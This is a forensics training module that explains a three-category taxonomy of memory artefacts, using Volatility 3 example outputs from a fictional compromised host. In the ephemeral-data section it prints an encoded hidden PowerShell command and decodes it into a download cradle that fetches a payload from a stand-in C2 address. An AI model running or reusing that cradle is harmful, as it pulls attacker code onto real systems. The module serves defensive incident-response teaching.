In this module
MF0.2 What Lives in Memory That Isn't on Disk
From MF0.1 you know memory is the decisive evidence for fileless malware, in-memory credential theft, LOLBin execution, and kernel rootkits — and when acquisition becomes mandatory. You know what memory wins against. What you don't yet have is a map of what's actually inside a memory image. That's what this sub builds.
Memory forensics succeeds or fails on the investigator's understanding of what memory contains. An investigator who treats memory as a homogeneous blob — "it's all just RAM" — can't prioritise acquisition during time-critical incidents, can't defend choices about what to analyse first when the image is 32 GB and the case is due in 48 hours, and can't explain to legal counsel why specific findings required memory rather than disk.
Memory isn't a blob. It's a structured collection of artefact categories, each with different volatility, different reliability, different acquisition sensitivity, and different forensic use cases. The investigator who knows the categories makes better acquisition decisions, better analysis decisions, and better reporting decisions.
This sub establishes the three-category taxonomy that structures the remainder of the course — volatile structures, ephemeral data, and transient artefacts — and the specific evidence types within each category that later modules will teach.
Deliverable: Working knowledge of the three memory artefact categories with concrete examples in each, the volatility ranking that determines acquisition priority, the relationship between each category and the investigation types it serves, and the taxonomy reference that organises analysis across every subsequent module.
Figure 0.2.1 — The three-category taxonomy. Each category has distinct discovery methods, reliability characteristics, and investigation use cases. Every finding you make in a memory forensics report classifies into one of these three.
Volatile structures — the kernel's bookkeeping
Volatile structures are the kernel's own record of what's running. They're the highest-reliability memory evidence because the kernel can't function without them, and they're where most investigations begin.
The first category is volatile structures — the kernel-maintained bookkeeping of everything happening on the system. The kernel keeps a running tally of processes, threads, network connections, open files, loaded drivers, and its own internal state because it has to. Without these structures the OS can't schedule work, route packets, or service system calls. An investigator reading a memory image reads the same structures the kernel was reading at acquisition.
Volatile structures have three forensic properties that matter. They're high-reliability because the kernel depends on them — a process in the active list existed, a TCP connection in the table was negotiated. They have multiple discovery methods because attackers manipulate them and the toolkit provides independent verification paths — processes can be enumerated by walking the active list, scanning the pool for process signatures, following thread back-references, or cross-referencing handles. When these methods disagree, the disagreement itself is evidence. And they're a named target for sophisticated attackers: Direct Kernel Object Manipulation unlinks a process from the active list while leaving thread structures intact; kernel hooks redirect NtQuerySystemInformation to filter out attacker processes. Defeating these manipulations is the foundation of the course's kernel-forensics modules.
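The cross-view verification idea can be sketched in a few lines. This is a hypothetical illustration, not Volatility API — the function name and PID values are invented; `pslist_pids` stands in for walking the kernel's linked active-process list, `psscan_pids` for pool-scanning for process signatures.

```python
# Hypothetical sketch: cross-view detection by comparing two independent
# process enumerations. A process found by pool scanning but absent from
# the list walk is the classic DKOM-unlinking signature.

def cross_view_diff(pslist_pids, psscan_pids):
    """Return PIDs visible to the scanner but missing from the list walk."""
    return sorted(set(psscan_pids) - set(pslist_pids))

# Illustrative data only -- not taken from the NE-FIN-014 image.
list_walk = [4, 88, 512, 1816, 2204, 4872]
pool_scan = [4, 88, 512, 1816, 2204, 4872, 6104]   # 6104 unlinked via DKOM

hidden = cross_view_diff(list_walk, pool_scan)
print(hidden)  # → [6104]
```

The point is the disagreement itself: an empty difference is unremarkable, a non-empty one is evidence that something edited the kernel's bookkeeping.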
The specific structures the course will teach include the process list (EPROCESS on Windows, task_struct on Linux), the thread list (ETHREAD, thread_info), the network connection table, per-process handle tables, the loaded module list, the VAD tree and VMA list, kernel callback lists, and the system call table. Each gets a dedicated subsection in the OS-specific phases.
Here's what volatile-structure evidence looks like in practice. Consider a memory image from NE-FIN-014 captured after a suspicious-process alert; the investigator enumerates network connections to find out what the compromised PowerShell was talking to.
$ vol -f NE-FIN-014-mem.raw windows.netscan
# Expected output (filtered for suspicious entries):
#
# Offset Proto LocalAddr ForeignAddr State PID Owner Created
# 0xfb8a0c TCPv4 192.0.2.14:51892 203.0.113.47:443 ESTABLISHED 4872 powershell.exe 2026-03-15 08:43:18
# 0xfc1220 TCPv4 192.0.2.14:51934 192.0.2.8:445 ESTABLISHED 4 System 2026-03-15 08:44:02
# 0xfd44e8 TCPv4 192.0.2.14:52018 203.0.113.47:443 CLOSED_WAIT 4872 powershell.exe 2026-03-15 11:22:47

The network connection table is populated and maintained by the Windows kernel as part of its normal operation — PID 4872 couldn't have communicated over TCP without an entry. The table links each connection to its owning process by PID and timestamps each connection's creation. Here it proves PID 4872 — the suspicious PowerShell from the earlier windows.pstree output — established two connections to 203.0.113.47:443: the first at 08:43:18 (36 seconds after process start), and a later one created at 11:22:47 and still present at acquisition in CLOSED_WAIT.
The C2 IP is now firm evidence tied to a specific process and timestamp. The firewall log would show the same connections, but the memory evidence independently proves the internal process that made them. That's the volatile-structure pattern: kernel populates the evidence as part of normal operation, the linkage to process context is direct, and reliability is high.
Ephemeral data — the applications' working state
Ephemeral data is what running applications hold in their own memory. It's the category that produces evidence appearing nowhere else — credentials, command history, decrypted documents — and the one that most rewards knowing what to look for.
The second category is ephemeral data. This is the working state that running applications hold in their own memory — cached credentials inside LSASS, Kerberos tickets in the Kerberos client cache, bash command history in the bash process's ring buffer, the clipboard inside Windows Explorer, decrypted documents inside the application that opened them, session tokens inside browser processes, environment variables inside every process's environment block.
Unlike volatile structures, ephemeral data isn't kernel-maintained. It lives in user-mode process memory, subject to whatever memory management the application chooses. That difference produces different forensic properties.
Reliability is context-dependent. A value's meaning depends on the application's state and configuration — a plaintext password in LSASS is decisive if WDigest was enabled at the time; the same region is empty on a modern Windows 10/11 system where WDigest is off by default. A bash history entry proves a command was typed in that shell, not that it completed, succeeded, or accessed what it appeared to target. Ephemeral data needs application-specific interpretation that volatile structures don't.
Discovery is typically single-path. Most ephemeral data has one correct extraction — the application-specific structure that contains it. There are rarely independent paths to the same ephemeral evidence the way there are for EPROCESS. Miss the bash history buffer and there's no pool-scan fallback that recovers it.
And ephemeral data is an intermittent anti-forensic target. LSASS credentials, SSH agent keys, decrypted session material — routinely targeted. Clipboard contents, DNS cache — rarely touched. The attacker's incentive varies case-by-case.
Here's what ephemeral-data extraction looks like. A PowerShell process (PID 4872) on NE-FIN-014 was launched with an encoded command line. Script Block Logging captured the encoded string on disk, but the investigator needs the decoded command.
$ vol -f NE-FIN-014-mem.raw windows.cmdline --pid 4872
# Expected output:
#
# PID Process Args
# 4872 powershell.exe powershell.exe -nop -w hidden -enc JABjAD0ATgBlAHcALQBPAGIAag
# BlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8
# AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAy
# ADAAMwAuADAALgAxADEAMwAuADQANwAvAGkAbgB2AC4AdAB4AHQAJwApAA==

The command-line arguments are stored in the process's RTL_USER_PROCESS_PARAMETERS structure, reached via the PEB on Windows, and remain in memory for the process's lifetime. Base64-decoding the -enc argument reveals the actual command: $c=New-Object Net.WebClient;$c.DownloadString('https://203.0.113.47/inv.txt'). The process downloaded a secondary payload from the same C2 IP that windows.netscan revealed, now confirmed in decoded form.
Disk log entries contain the encoded string. The decoded command is application-held state that lives only in the process's memory until it exits. That's ephemeral data in practice: evidence is application-held, context-dependent, and extraction is per-application.
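The decoding step itself is mechanical and worth seeing once. A minimal sketch: PowerShell's -EncodedCommand is Base64 over UTF-16LE (not UTF-8), so the payload from the windows.cmdline output above decodes with two standard-library calls.

```python
import base64

# The -enc argument recovered by windows.cmdline, concatenated across
# the wrapped output lines above.
enc = ("JABjAD0ATgBlAHcALQBPAGIAag"
       "BlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8"
       "AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAy"
       "ADAAMwAuADAALgAxADEAMwAuADQANwAvAGkAbgB2AC4AdAB4AHQAJwApAA==")

# PowerShell encodes the command as UTF-16LE before Base64 encoding.
decoded = base64.b64decode(enc).decode("utf-16-le")
print(decoded)
# → $c=New-Object Net.WebClient;$c.DownloadString('https://203.0.113.47/inv.txt')
```

Decoding with `utf-8` instead produces garbage interleaved with null bytes — a common first stumble when handling -enc payloads.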
Transient artefacts — the attack's footprints
Transient artefacts are the traces attackers leave behind in memory. They have no legitimate analogue, they're the target of every anti-forensic technique, and finding them requires pattern-based scanning rather than list walking.
The third category is transient artefacts — the memory artefacts introduced by attacker activity. Code injected into a legitimate process, reflectively-loaded DLLs that don't appear in the module list, process hollowing where an image section no longer matches its VAD contents, kernel hooks in function pointer tables, shellcode sitting in a heap region of a normally-benign application. Transient artefacts exist because an attack occurred and disappear the moment the attacker's payload unloads, the affected process terminates, or the system reboots. They have no legitimate analogue on a clean system.
Transient artefacts have the most aggressive forensic properties.
Discovery is pattern-based, not list-walking. Because attackers designed these artefacts specifically to evade detection, there's no authoritative list to enumerate. Finding injected code means scanning every VAD entry for regions with suspicious characteristics — executable + writable + private, containing MZ/PE headers, not backed by a file on disk. Finding kernel hooks means walking every function pointer table and comparing each pointer against expected symbol addresses. Finding rootkit-allocated memory means pool-tag-scanning and investigating every allocation that doesn't match legitimate structures.
Reliability varies with attacker technique. Classical techniques — basic reflective injection, SSDT hooking — leave clear signatures that any modern plugin detects. Modern techniques — module stomping, eBPF-based hooking, kernel structure manipulation that preserves all integrity invariants — may not surface in first-pass tool output.
Transient artefacts are always an anti-forensic target. Every one was placed by an attacker who wanted it to work undetected. Unlike volatile structures, which attackers sometimes manipulate to stay hidden, or ephemeral data, which attackers sometimes scrub, transient artefacts are hostile to investigation by default.
Transient artefacts covered later in the course include RWX injected code regions, reflectively-loaded DLLs absent from PEB_LDR_DATA, process hollowing evidence, process doppelgänging and herpaderping, kernel-mode injected code in the system working set, SSDT and IDT and GDT hooks, kernel callback hijacking, Linux syscall table hooks, VFS operation table hooks, netfilter hooks used for C2 concealment, eBPF-based rootkit programs, rootkit-allocated kernel memory regions, shellcode in application heap segments, and unlinked kernel objects hidden via DKOM.
Concretely, transient artefact discovery looks unlike the first two categories. There's no "list of injections" the kernel maintains — finding injected code means scanning every process's VAD tree for regions whose characteristics are anomalous. This is pattern-based hunting, not list walking.
# Scan every process for suspicious memory regions. Unlike pslist or
# netscan, there's no authoritative list — this plugin walks every
# process's VAD tree and flags regions by anomaly pattern.
$ vol -f NE-FIN-014-mem.raw windows.malfind
# Expected output (filtered for highest-confidence findings):
#
# PID Process VAD Start VAD End Protection Notes
# 4872 powershell.exe 0x7ff8a2100000 0x7ff8a2118000 PAGE_EXECUTE_READWRITE Private, MZ header, no file backing
# 1816 explorer.exe 0x0000022f4a3c0000 0x0000022f4a3c2000 PAGE_EXECUTE_READWRITE Private, no PE header — investigate
# 2204 chrome.exe 0x0000013b87600000 0x0000013b8762a000 PAGE_EXECUTE_READWRITE Private, JavaScript JIT — benign

The plugin walked every process's VAD tree and returned every region matching the "executable + writable + private" pattern. Three hits appear. One is expected: JavaScript JIT in Chrome. One is ambiguous: the small region in Explorer has no PE header and needs further analysis before it can be dismissed. The third, in PID 4872, shows the pattern plus an MZ header: a reflectively-loaded PE with no corresponding entry in the module list, no file backing on disk, and no record the kernel maintains of its existence.
The investigator found it by asking a pattern-based question — "show me memory regions that look like injected code" — rather than by walking an authoritative list. That's the defining property of transient artefacts: they're hostile to investigation by design, and detection requires scanning for anomalies rather than enumerating known objects.
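The anomaly test itself is simple once the VAD entries are parsed. A hypothetical sketch, assuming entries have already been extracted into dicts — the field names are invented for illustration, not the layout any real plugin uses:

```python
# Sketch of a malfind-style anomaly filter over parsed VAD entries.

def suspicious(vad):
    """Flag private, writable-and-executable regions with no file
    backing -- the classic injected-code pattern."""
    return (vad["protection"] == "PAGE_EXECUTE_READWRITE"
            and vad["private"]
            and vad["mapped_file"] is None)

# Illustrative entries only -- not taken from the NE-FIN-014 image.
vads = [
    {"pid": 4872, "protection": "PAGE_EXECUTE_READWRITE",
     "private": True,  "mapped_file": None},                  # injected PE
    {"pid": 4872, "protection": "PAGE_EXECUTE_WRITECOPY",
     "private": False, "mapped_file": r"C:\Windows\System32\ntdll.dll"},
    {"pid": 2204, "protection": "PAGE_READWRITE",
     "private": True,  "mapped_file": None},                  # plain heap
]

hits = [v["pid"] for v in vads if suspicious(v)]
print(hits)  # → [4872]
```

Note that the filter enumerates everything and keeps what matches a pattern — the inverse of walking an authoritative list and trusting its contents.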
The situation. You're reviewing a VAD dump from an analyst on your team. The dump lists a memory region in an NE-FIN-014 process with PAGE_EXECUTE_READWRITE protection, private allocation, no file backing, no module in the process's module list — but the first bytes are 4D 5A 90 00, clearly a PE image. The analyst classified it as "volatile structure — kernel bookkeeping of the process's memory layout" because it came from a VAD tree, which is kernel-maintained.
The choice. Accept the classification since the VAD tree is indeed a volatile structure, or push back because classification isn't determined by which tool surfaced the finding.
The correct call. Push back. The VAD tree is a volatile structure; an entry within it describing a private executable region with a PE header and no file backing is a transient artefact — attack-introduced, pattern-based discovery, anti-forensic target. The practical consequence of the misclassification is that the finding gets reported with claim language for volatile structures ("the process had this VAD entry") rather than transient artefacts ("the process contained an injected PE image of these characteristics; injection occurred between process start and acquisition"). The stronger, more specific claim is the correct one.
The operational lesson. Classify by what the evidence is, not where the tool found it. The same underlying structure can hold evidence from all three categories — a VAD entry might describe a normal loaded module (volatile), a JIT-compiled region (ephemeral), or an injected payload (transient). The classification follows the nature of the finding, not the plugin that produced it.
The myth. Volatility 3 ships with an extensive plugin library covering processes, network connections, DLLs, kernel objects, credentials, and rootkit detection. Running the full suite on a memory image produces comprehensive coverage. If a finding doesn't appear in any plugin's output, it's reasonable to conclude the evidence isn't present.
The reality. Volatility 3's plugins cover established techniques for each artefact category well. They don't cover every artefact, and they don't cover emerging techniques until the plugin catches up.
Coverage is strongest for volatile structures — process, network, and handle plugins are mature. It's moderate for ephemeral data — credential plugins exist for common cases, but application-specific extraction is typically manual. It's variable for transient artefacts — classical injection techniques are caught, novel techniques may not be.
An investigator who runs the full plugin suite and concludes "nothing found" has demonstrated that nothing was found using those plugins. The investigator who then examines VAD trees for anomalies, pool-scans for unexpected tags, and compares module lists against active threads has searched for what exists rather than for what plugins report. The plugin suite is a starting point, not an endpoint. Later modules repeatedly demonstrate cases where plugin output is clean and manual structural analysis reveals compromise.
How the taxonomy guides investigation decisions
The taxonomy is operational, not theoretical. It tells you what to capture when acquisition is time-constrained, what to analyse first when triaging a fresh image, and what claim strength a finding supports in your report.
The three categories aren't just a mental model. They drive specific investigation decisions.
Acquisition priority when memory capture is time-constrained. When the acquisition tool runs slower than expected, when the attacker may be watching for acquisition activity, or when the live-response window is short, the volatility hierarchy determines what to capture first. Volatile structures change constantly but are captured by any image. Ephemeral data gets lost to normal process activity — clipboard overwrites, buffer recycling — but not to time alone. Transient artefacts disappear if the attacker's payload terminates or unloads during acquisition. Priority order: transient first, then ephemeral, then volatile. In practice this argues for full acquisition; when acquisition must be partial, the category determines the sequence.
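The priority argument reduces to a fixed ranking. A trivial sketch — the ranking is the course's, the code shape is hypothetical:

```python
# Acquisition priority by artefact category: lower rank = capture first.
PRIORITY = {"transient": 0, "ephemeral": 1, "volatile": 2}

targets = ["volatile", "transient", "ephemeral"]
ordered = sorted(targets, key=PRIORITY.get)
print(ordered)  # → ['transient', 'ephemeral', 'volatile']
```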
Analysis priority when triaging a fresh image. Faced with a memory image and the question "was this system compromised," the transient artefact category is where compromise evidence most often lives. Scanning for injected code, unusual module loads, kernel hook anomalies, and pool-tag anomalies gets you to the compromise signal faster than enumerating the full process list first. Once compromise is identified, volatile structures provide the context — what processes, what connections, what handles — and ephemeral data provides the specifics — what commands, what credentials.
Reporting claims based on category. Every finding in a memory report should carry claim strength that matches the evidence category. Volatile structure findings support strong claims: "at the time of acquisition, this process was running, owned by this user, with these open handles." Ephemeral data supports specific but context-qualified claims: "at acquisition, this credential was cached in LSASS; it would have been cached because of a logon that occurred at or after boot at 08:14 UTC." Transient artefacts support claims that need correlation: "at acquisition, this process contained an injected DLL of X characteristics; injection occurred between process start at 14:22 and acquisition at 21:47." The category structures the language of confident reporting.
Try it: classify malfind hits against a self-captured image
Use any memory image you have available — your own analyst workstation captured with WinPmem, or one of the practice images from the NE scenario pack you'll set up in MF0.9. Run vol -f image.raw windows.malfind and capture the output.
For each hit the plugin reports, classify it into one of the three taxonomy categories. Most hits on a clean image will classify as ephemeral data — JavaScript JIT regions in browsers, .NET JIT in managed processes, dynamic code generation in legitimate software. Hits on a compromised image will include transient artefacts — reflectively-loaded DLLs, shellcode regions, hollowed processes.
For each hit, write one sentence explaining what in the plugin output supports your classification — the specific field, the specific value, the specific pattern. This is the working judgment memory forensics requires: the plugin flags a region, and your job is to decide what that region is. The exercise trains the judgment every later module assumes.
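As a starting point for the exercise, the first-pass heuristics can be written down. This is a hypothetical sketch — the field names and process allow-list are invented, and real classification requires the judgment the exercise trains, not a lookup table:

```python
# Rough first-pass taxonomy guess for a malfind-style hit.
# Processes that legitimately generate dynamic code (browser JS JIT,
# .NET JIT) -- an assumed, incomplete allow-list.
JIT_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "powershell.exe"}

def classify(hit):
    if hit["has_mz_header"] and hit["mapped_file"] is None:
        return "transient"       # unbacked PE image: injected code
    if hit["process"] in JIT_PROCESSES and not hit["has_mz_header"]:
        return "ephemeral"       # likely JIT / dynamic code generation
    return "needs-analysis"      # the honest default

print(classify({"process": "chrome.exe", "has_mz_header": False,
                "mapped_file": None}))   # → ephemeral
print(classify({"process": "powershell.exe", "has_mz_header": True,
                "mapped_file": None}))   # → transient
```

The `needs-analysis` default is the important design choice: a hit that matches neither pattern is a question, not a benign finding.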
MF0 built the three-VM lab and established the memory forensics landscape. MF1 taught acquisition with WinPmem and LiME, integrity verification, and chain of custody. From here, you execute attacks and investigate what they leave behind.
- 8 attack modules (MF2–MF9) — process injection, credential theft, fileless malware, persistence, kernel drivers, Linux rootkits, timeline construction, and a multi-stage capstone
- You run every attack yourself — from Kali against your target VMs, then capture memory and investigate your own attack's artifacts with Volatility 3
- MF9 Capstone — multi-stage chain (initial access → privilege escalation → credential theft → persistence → data staging), three checkpoint captures, complete investigation report
- The lab pack — PoC kernel driver and LKM rootkit source code, setup scripts, 21 exercises, 7 verification scripts, investigation report templates
- Cross-platform coverage — Windows and Linux memory analysis in one course, with the timeline module integrating evidence from both